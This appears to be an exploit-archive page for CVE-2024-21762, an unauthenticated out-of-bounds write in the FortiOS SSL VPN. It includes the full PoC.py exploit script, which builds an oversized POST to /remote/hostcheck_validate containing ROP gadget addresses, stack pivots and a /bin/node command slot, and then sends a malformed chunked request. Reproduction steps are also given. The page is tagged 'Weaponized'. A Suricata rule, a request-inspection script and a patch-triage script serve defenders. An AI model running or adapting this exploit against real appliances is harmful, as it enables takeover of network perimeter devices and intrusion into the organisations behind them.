PoC Archive

Fortinet FortiOS SSL VPN Unauthenticated RCE (CVE-2024-21762)

by d0rb (PoC), vulnerability publicly documented by Fortinet/industry researchers · 2026-05-16

CVSS:               9.6/10
Severity:           Critical
CVE:                CVE-2024-21762
Category:           web
Affected product:   Fortinet FortiOS SSL VPN (sslvpnd)
Affected versions:  FortiOS 7.4.0–7.4.2, 7.2.0–7.2.6, 7.0.0–7.0.13, 6.4.0–6.4.14, 6.2.0–6.2.15
Disclosed:          2026-05-16
Patch status:       patched

Metadata

Field                Value
Date Added           2026-05-16
Author / Researcher  d0rb (PoC), vulnerability publicly documented by Fortinet/industry researchers
CVE / Advisory       CVE-2024-21762
Category             web
Severity             Critical
CVSS Score           9.6 (CVSSv3)
Status               Weaponized
Tags                 RCE, out-of-bounds-write, SSL-VPN, FortiOS, edge-appliance, unauthenticated, KEV
Related              N/A

Affected Target

Field                    Value
Software / System        Fortinet FortiOS SSL VPN (sslvpnd)
Versions Affected        FortiOS 7.4.0–7.4.2, 7.2.0–7.2.6, 7.0.0–7.0.13, 6.4.0–6.4.14, 6.2.0–6.2.15
Language / Platform      FortiOS appliance SSL VPN web interface over HTTP/HTTPS
Authentication Required  No
Network Access Required  Yes

Summary

CVE-2024-21762 is a critical out-of-bounds write in FortiOS sslvpnd reachable through the SSL VPN web interface. A remote unauthenticated attacker can send crafted HTTP requests to corrupt memory and potentially achieve remote code execution. Public reporting and government advisories indicate active exploitation in the wild, and the vulnerability is listed in CISA KEV.


Vulnerability Details

Root Cause

The flaw is an out-of-bounds write condition in SSL VPN request processing inside the sslvpnd daemon. Crafted request data can push memory operations outside intended bounds, enabling attacker-controlled memory corruption.

Attack Vector

An attacker with network reachability to an exposed FortiOS SSL VPN endpoint sends specially crafted HTTP(S) requests to a vulnerable path (public PoC examples commonly use /remote/hostcheck_validate) to trigger the out-of-bounds write and pivot to a ROP-based execution path.

Impact

Successful exploitation can lead to unauthenticated remote code execution on perimeter security appliances. This can result in device takeover, lateral movement, credential access, and persistence from a highly privileged network position.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host with Python 3
Target:      Authorized FortiOS SSL VPN endpoint in vulnerable version range
Attacker:    Security testing workstation
Tools:       Python 3, socket-capable network access, packet capture (optional)

Setup Steps

cd pocs/web/2026-05-16_fortios-sslvpn-rce-cve-2024-21762

python3 -m py_compile PoC.py

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized scope and reachable SSL VPN service.

    nc -vz <target-ip-or-hostname> 443

  2. Edit target parameters in the PoC (TARGET_HOST, PORT) for your authorized lab target.

    sed -n '1,30p' PoC.py

  3. Run the PoC to send crafted trigger traffic.

    python3 PoC.py

Exploit Code

See PoC.py in this folder.

import socket

TARGET_HOST = "x.x.x.x"
PORT = 80

data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"

Expected Output


Screenshots / Evidence

  • screenshots/ — add authorized captures (traffic traces, target crash logs, controlled exploit validation)

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HOME_NET 443 (msg:"Possible FortiOS CVE-2024-21762 exploitation attempt"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/remote/hostcheck_validate"; http_uri; \
  sid:952421762; rev:1;)
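
The rule above keys on the first request in PoC.py; the PoC's second request is a chunked POST whose chunk-size line runs to thousands of characters. The following is an added example (not part of the original page or the PoC) that checks decrypted HTTP/1.1 requests for both patterns. The sample requests are constructed, and the 16-digit limit and the assumption that traffic is inspected after TLS termination are this example's own.

```python
import re

HOSTCHECK_PATH = b"/remote/hostcheck_validate"  # path named in the rule above
MAX_SIZE_DIGITS = 16  # assumed sanity limit for a chunk-size field
HEX_RE = re.compile(rb"[0-9A-Fa-f]+")

def inspect_request(raw):
    """Return a list of findings for one decrypted HTTP/1.1 request."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if method == b"POST" and target.split(b"?", 1)[0] == HOSTCHECK_PATH:
        findings.append("POST to hostcheck_validate")
    if body and b"chunked" in headers.get(b"transfer-encoding", b""):
        # First body line is "<hex size>[;extension]" per RFC 9112.
        size = body.split(b"\r\n", 1)[0].split(b";", 1)[0].strip()
        if not HEX_RE.fullmatch(size):
            findings.append("chunk size is not hexadecimal")
        elif len(size) > MAX_SIZE_DIGITS:
            findings.append("oversized chunk-size field")
    return findings

HOST = b"Host: vpn.example.test\r\n"  # constructed host name
CHUNKED = b"POST / HTTP/1.1\r\n" + HOST + b"Transfer-Encoding: chunked\r\n\r\n"
SAMPLES = {  # constructed requests, not captured traffic
    "login_page": b"GET /remote/login HTTP/1.1\r\n" + HOST + b"\r\n",
    "normal_chunked": CHUNKED + b"5\r\nhello\r\n0\r\n\r\n",
    "hostcheck_post": b"POST /remote/hostcheck_validate HTTP/1.1\r\n" + HOST
                      + b"Content-Length: 3\r\n\r\na=b",
    "long_size_field": CHUNKED + b"0" * 300 + b"\r\n\r\n",
    "nul_in_size_field": CHUNKED + b"0\x00A\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {inspect_request(raw) or 'clean'}")
```
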

Remediation

Action            Detail
Patch             Apply Fortinet fixes from FG-IR-24-015 (upgrade to patched FortiOS trains such as 7.4.3+, 7.2.7+, 7.0.14+, 6.4.15+, 6.2.16+)
Workaround        Restrict or disable Internet-exposed SSL VPN where possible until patched
Config Hardening  Limit management/VPN exposure to trusted networks, monitor SSL VPN anomalies, and enforce strong admin hygiene
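
To turn the patch row into an upgrade queue, the following added example (not from the original page or from Fortinet) classifies reported FortiOS versions against the fixed releases listed above. The inventory, host names and version-string formats are constructed; trains the page does not list are reported as "unlisted" rather than assumed safe.

```python
import re

# FortiOS train -> first fixed patch level, taken from the Remediation table above
FIRST_FIXED = {(7, 4): 3, (7, 2): 7, (7, 0): 14, (6, 4): 15, (6, 2): 16}
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")

def triage(version_string):
    """Return (status, upgrade_target) for one reported FortiOS version."""
    match = VERSION_RE.search(version_string)
    if not match:
        return ("unparsed", None)
    major, minor, patch = (int(part) for part in match.groups())
    fixed = FIRST_FIXED.get((major, minor))
    if fixed is None:
        # Train is not in the page's table: do not report it as safe.
        return ("unlisted", None)
    if patch < fixed:  # integer compare, so 7.0.13 sorts above 7.0.9
        return ("affected", f"{major}.{minor}.{fixed}+")
    return ("fixed", None)

def patch_queue(inventory):
    """Hosts that are not confirmed fixed, sorted by name, with their target."""
    queue = []
    for host in sorted(inventory):
        status, target = triage(inventory[host])
        if status != "fixed":
            queue.append((host, status, target))
    return queue

# Constructed inventory; host names and version strings are made up.
INVENTORY = {
    "fw-edge-01": "v7.2.6,build1575",
    "fw-edge-02": "7.4.3",
    "fw-branch-03": "FortiOS 7.0.13",
    "fw-legacy-04": "6.0.18",
    "fw-dr-05": "version unknown",
}

if __name__ == "__main__":
    for row in patch_queue(INVENTORY):
        print(row)
```
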

References


Notes

Auto-ingested from https://github.com/d0rb/CVE-2024-21762 on 2026-05-16.

PoC.py
"""DISCLAIMER: For authorized security research only. Use only on systems you own or are explicitly authorized to test."""

import socket
import time

TARGET_HOST = "x.x.x.x"
PORT = 80

# Function to create a socket
def make_sock(target, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    return sock

# Craft the payload
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00"  # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00"  # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b"%de%ad%be%ef"  # Example ROP chain

# Craft the form value
form_value = b""
form_value += b"B" * 11 + b"/bin/node\0" + b"B" * 6 + b"-e\0" + b"B" * 14 + b"JS_PAYLOAD"
form_value += b"B" * 438 + pivot_2 + getcwd_ptr
form_value += b"B" * 32 + pivot_1
form_value += b"B" * 168 + b"CALL_EXECL"
form_value += b"B" * 432 + ssl_do_handshake_ptr
form_value += b"B" * 32 + rop

# Craft the HTTP body
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20

# Craft the HTTP request
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body

# Send the crafted request
ssock1 = make_sock(TARGET_HOST, PORT)
ssock1.sendall(data)
time.sleep(1)
ssock2 = make_sock(TARGET_HOST, PORT)
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0" * 4137 + b"\0"
data += b"A" * 1 + b"\r\n\r\n"
ssock2.sendall(data)